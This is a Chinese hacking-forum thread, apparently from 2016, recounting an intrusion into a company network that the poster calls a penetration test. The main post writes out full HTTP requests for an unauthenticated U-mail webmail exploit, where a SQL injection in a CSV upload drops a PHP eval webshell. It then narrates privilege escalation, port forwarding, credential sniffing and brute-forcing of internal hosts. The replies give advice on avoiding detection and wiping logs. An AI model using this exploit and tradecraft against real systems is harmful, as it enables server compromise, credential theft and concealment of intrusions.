记得一次艰难的内网漫游
进入红盟太极实验室也有段时间了,暑假也来了,昨天管理大大发话了,督促我们发帖了,那么今天发篇前段时间的干货吧。因为这个站是一次渗透测试项目的站,所以全程打马赛克,请各位见谅。
首先呢我看了下这个站主站没什么漏洞,也可以说我这个菜鸟啥都不会找不到漏洞吧。主站是个精良南方明显打过补丁的啥希望都没了,我们领导是让我给他搞个能进OA系统的管理员账户,于是我就看了下OA。结果让我感到无奈啊,这特么的是泛微CMS挺蛋疼的,你说我要是有一枚地下0day该有多好。这真的挺蛋疼的百度上找了好多关于泛微CMS的漏洞没一个能用的,最后一点希望也破灭了。 无奈最后扫了下子域名发现了一个邮箱系统!居然是U-mail的CMS感觉很脆的样子,我就到某云上面找了几篇关于U-mail的前台GETShell方法。恩就是只要三个步骤的那个。具体GETShell操作如下:第一步,获得物理路径请求GET /webmail/client/mail/module/test.php HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive 第二步,请求为,响应中获得PHPSESSIDPOST /webmail/fast/index.php?module=operate&action=login HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
mailbox=system@**.**.**.**&link=?
第三步,将PHPSESSID和路径写入如下请求,执行getshell EXP即可POST /webmail/fast/pab/index.php?module=operate&action=contact-import HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 553
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary69fA5vmkAMLB8gmA
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: PHPSESSID=53ad27d7a64bd68d372be8a94985606d
------WebKitFormBoundary69fA5vmkAMLB8gmA
Content-Disposition: form-data; name="import_file"; filename="getshell.csv"
Content-Type: application/vnd.ms-excel
Ãû,µç×ÓÓʼþµØÖ·
hello1,hello' AND 1=2 UNION SELECT '<?php eval($_POST);' INTO OUTFILE 'c:\\umail\\WorldClient\\html\\shell.php'#
------WebKitFormBoundary69fA5vmkAMLB8gmA
Content-Disposition: form-data; name="import_group"
10
------WebKitFormBoundary69fA5vmkAMLB8gmA
Content-Disposition: form-data; name="import_mode"
ignore
------WebKitFormBoundary69fA5vmkAMLB8gmA-- 因为我也比较懒就没截这么多张图了具体看不懂的同学可以到某云的bugs/wooyun-2015-093049/这个地址看大牛怎么操作。只知道能GETShell就行了。原本以为拿到Shell链接数据库就算大工告成了,结果没想到的是他把其他网站放在了内网其他的机器上面,这下就麻烦了难怪我搞了半天没找到OA系统的目录。出于无奈于是我就提权试下,结果还真是尴尬了。3389都开在内网。出于无奈只好上传个lcx来转发端口,可笑的是我转发一下午没转发出来……后来让我朋友看下,他说我服务器接收不到转发的数据。那就算了换一台服务器搞,结果还真是转发出来了。 端口转发应该就不用解释了,玩过的同学都应该知道怎么整的。执行完这两步骤就可以链接127.0.0.1然后我转发的端口是6677我就连接了127.0.0.1:6677。哦!我的天呐真是久违的一幕,我真是太爱你了。好了话不多说直接上去干。我先是在服务器上面传了个Cain嗅探工具你懂得嘻嘻~不过可悲的是我嗅探了一下午都没嗅探到东西,后来想想我知道了估计人家下班了我日。无奈我就穿了个Hscan上去爆破但愿有戏吧。结果真没让我失望!真的爆破到了好多内网机器。其他的就不多说了上去就是干,一句话不和就是日他。=,=
不错不错,继续努力。想做一个真正的黑客还很远。黑客最重要的是什么?攻击成功的同时不暴露自己。 你说的徽章一事,会解决的。只是最近比较忙没时间处理
RE: 记得一次艰难的内网漫游
wuyan 发表于 2016-7-3 15:34你说的徽章一事,会解决的。只是最近比较忙没时间处理
谢谢管理大大 表示不推荐一开始就嗅探,嗅探太容易被发现了,话说爆破的字典应该不是默认的吧?如不过不是默认的话可以吧如何收集到的字典也写出来也是给大家提供一个思路,还有就是也不推荐自己添加用户,至于怎么获得管理员的用户名密码这个就不多说了。也不看看是否存在域,存在域的话直接一个域管理员就通杀了啊。。。。
RE: 记得一次艰难的内网漫游
No0d1es 发表于 2016-7-3 15:40表示不推荐一开始就嗅探,嗅探太容易被发现了,话说爆破的字典应该不是默认的吧?如不过不是默认的话可以吧 ...
惊现大神!!!!!!{:3_41:} 把你hscan的爆破字典来一份 做内网,不到万不得已千万别去爆破和嗅探 重要的事情说三篇
日志 痕迹 搽干净 打码不行啊 这公司域名倒是不错三个数字- - :lol
页:
[1]
2